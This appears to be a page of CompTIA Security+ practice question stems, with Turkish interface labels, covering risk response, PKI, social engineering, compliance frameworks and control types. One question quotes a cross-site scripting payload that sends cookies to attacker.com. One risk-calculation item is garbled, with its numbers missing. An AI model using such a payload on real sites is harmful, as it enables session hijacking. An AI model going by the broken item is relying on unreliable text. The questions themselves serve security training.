Tüm alıştırma soruları
2232 soru
An enterprise discovers that a specialized legacy API used for international currency conversion cannot be secured against recent protocol vulnerabilities. Because the revenue generated through this API is minimal compared to the potential liability of a security breach, the executive team decides to disable and remove the API entirely from production, halting all processing of those transactions. Which of the following risk response strategies did the organization implement?
An enterprise security policy requires software developers to digitally sign compiled binaries using a dedicated Hardware Security Module (HSM) USB token. Which of the following represents the correct sequential order of steps required to obtain and prepare the code signing certificate on the hardware token, from first to last?
Öğeleri doğru sıraya koymak için sürükleyin
Match each regulatory compliance framework or legal mandate on the left with its primary data governance scope and organizational requirement on the right.
Soldaki öğeye tıklayın, sonra eşleşen sağdaki öğeye tıklayın
Öğeler
Eşleşmeler
Following an enterprise-wide remediation effort to patch critical remote code execution vulnerabilities across multiple database servers, a security analyst must confirm that all identified flaws have been successfully resolved. To complete this verification efficiently without causing unnecessary network overhead or waiting for a complete multi-subnet scan cycle, which of the following scanning approaches should the analyst execute?
During a routine security monitoring shift, a Security Operations Center (SOC) analyst reviews an event logged by an out-of-band Network Intrusion Detection System (NIDS). The NIDS alert triggers on inbound HTTP GET traffic directed at a customer portal web server containing the payload string `?user=<script>window.location='http://attacker.com/steal.php?c='+document.cookie</script>`. A junior team member claims the log depicts database manipulation and recommends modifying SQL database queries. Which of the following best evaluates the NIDS alert and identifies the most appropriate remediation strategy?
Match each data privacy and protection technique on the left with its corresponding operational implementation on the right.
Soldaki öğeye tıklayın, sonra eşleşen sağdaki öğeye tıklayın
Öğeler
Eşleşmeler
An enterprise deploys host-based agent software on all employee workstations to continuously monitor volatile memory for anomalous activity and automatically generate alerts for the security operations center upon identifying suspicious API calls. According to CompTIA Security+, which control category and functional type combination does this host-based monitoring software represent?
A systems administrator needs to request and deploy a new SSL/TLS certificate for an enterprise web application using an internal Certificate Authority (CA). Arrange the steps of the certificate enrollment and deployment process in the correct chronological order from first to last.
Öğeleri doğru sıraya koymak için sürükleyin
An IT administrator receives an unverified request for sensitive internal network topology diagrams. When the administrator hesitates to comply, the requester claims that three senior network engineers in the department have already submitted their respective section diagrams for the ongoing audit. Reassured that colleagues have already complied, the administrator releases the requested files. Which of the following principles of influence did the attacker primarily exploit?
A defense contracting firm is deploying a cloud-based information system to store and process Controlled Unclassified Information (CUI) for federal procurement projects. To fulfill federal regulatory requirements for safeguarding CUI residing in non-federal systems, which compliance framework must the firm implement?
Match each vulnerability assessment methodology with its corresponding operational characteristic or execution behavior.
Soldaki öğeye tıklayın, sonra eşleşen sağdaki öğeye tıklayın
Öğeler
Eşleşmeler
An organization observes significant latency during TLS handshakes because client browsers independently query an external Certificate Authority (CA) to check revocation status. Additionally, the privacy team raises concerns that direct client queries allow the CA to monitor user browsing activity. Which of the following features should the security administrator configure on the web server to reduce latency and address the privacy concern?
An autonomous vehicle fleet management enterprise is restructuring its security management oversight framework following an external compliance review. Match each security governance document type on the left with its corresponding organizational function and enforcement authority on the right.
Soldaki öğeye tıklayın, sonra eşleşen sağdaki öğeye tıklayın
Öğeler
Eşleşmeler
A fintech enterprise developing a cloud-native payment gateway is undergoing a third-party risk assessment by a prospective banking partner. The partner demands verified proof that security, confidentiality, and availability controls were not only properly designed but also maintained operational effectiveness throughout the preceding nine months. Which attestation report should the fintech enterprise provide to satisfy this requirement?
A logistics company is conducting a quantitative risk assessment for its primary fleet telemetry server. The server has an estimated Asset Value () of ARO ALE 90,000, what is the Exposure Factor () for this security risk?
A security administrator is optimizing the Public Key Infrastructure (PKI) architecture for an enterprise web portal that hosts services across multiple distinct domain names. The administrator must eliminate client-side OCSP lookup delays during TLS handshakes and consolidate multi-domain identity validation into a single digital certificate. Which of the following PKI mechanisms should the administrator implement to meet these objectives? (Select TWO.)
Geçerli olan tümünü seçin
A security analyst receives a high-severity alert from an inline Network Intrusion Prevention System (NIPS) indicating potential encrypted command-and-control (C2) beaconing originating from an internal endpoint to an untrusted external IP address. In what sequence should the analyst execute the network security monitoring and initial containment workflow?
Öğeleri doğru sıraya koymak için sürükleyin
A software developer is building an internal customer portal. To safeguard sensitive payment details, the portal must visually hide all but the last four digits of a user's credit card number when viewed by support staff, while keeping the original stored data intact for transaction processing. Which of the following control techniques best achieves this requirement?
Match each social engineering attack vector on the left to the real-world enterprise incident scenario on the right that best illustrates it.
Soldaki öğeye tıklayın, sonra eşleşen sağdaki öğeye tıklayın
Öğeler
Eşleşmeler
An organization is updating its enterprise risk management framework and classifying its existing defense mechanisms according to CompTIA Security+ control categories. The Chief Information Security Officer (CISO) requests an inventory of all Managerial (Administrative) controls currently implemented across the company. Which of the following defense mechanisms qualify as Managerial controls? (Select TWO.)
Geçerli olan tümünü seçin